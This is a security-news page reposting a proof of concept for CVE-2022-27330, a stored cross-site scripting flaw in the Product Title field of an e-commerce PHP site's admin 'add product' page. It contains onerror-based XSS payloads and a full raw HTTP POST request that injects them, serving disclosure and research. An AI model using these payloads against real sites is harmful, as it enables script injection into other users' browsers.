Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-27330: GitHub - CP04042K/Full-Ecommece-Website-Add_Product-Stored_XSS-POC

A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_product of E-Commerce Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Title text field.

CVE
Open in Source
#xss#vulnerability#web#windows#apple#google#git#php#chrome#webkit

Full-Ecommece-Website-Add_Product-Stored_XSS-POC

  • Note => Login to admin
  • Description => Stored_XSS at Product Title

Step to Reproduct

  • Login to admin -> Add Product -> input payload <img/src/onerror=prompt(10)> at Product Title -> Product Title

Exploit

Vulnerable Code

  • When inserting into the database, the input is not filtered out characters

POC

  • Injection Point

------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="product_title"

<image/src/onerror=prompt(8)>

  • Request

POST /Full-Ecommece-Website/Codes/public/admin/index.php?add_product HTTP/1.1 Host: localhost:8080 Content-Length: 1354971 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", “Chromium";v="99” sec-ch-ua-mobile: ?0 sec-ch-ua-platform: “Windows” Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXtBAIsNDayF64Ebh User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/Full-Ecommece-Website/Codes/public/admin/index.php?add_product Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=oam3rcbi14nilh2pp3s21upev5; twk_uuid_5c2396fb7a79fc1bddf24b28={"uuid":"1.AGDzvqvmbboNUBtyBA0XLKxrviwKWw7HVKOjPqv5aIOJHjOnigPvpa5cn7QPGv6D5QwLM7ZIIBSpua1NrhQBpEeAdolcmuMk3JJtap3Nu2WjBL31HFdBqMF9VFcu8Olw","version":3,"domain":null,"ts":1647022863776}; TawkConnectionTime=0 Connection: close

------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="product_title"

<image/src/onerror=prompt(8)> ------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="product_description"

hacked ------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="product_price"

10000 ------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="short_desc"

hacked ------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="publish"

Publish ------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="product_category_id"

12 ------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="product_quantity"

1 ------WebKitFormBoundaryXtBAIsNDayF64Ebh Content-Disposition: form-data; name="file"; filename="car.png" Content-Type: image/png

PNG

VIDEO POC https://drive.google.com/file/d/155K4qLwGI8kwctd5FijU9gzonSA2rMFz/view?usp=sharing

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE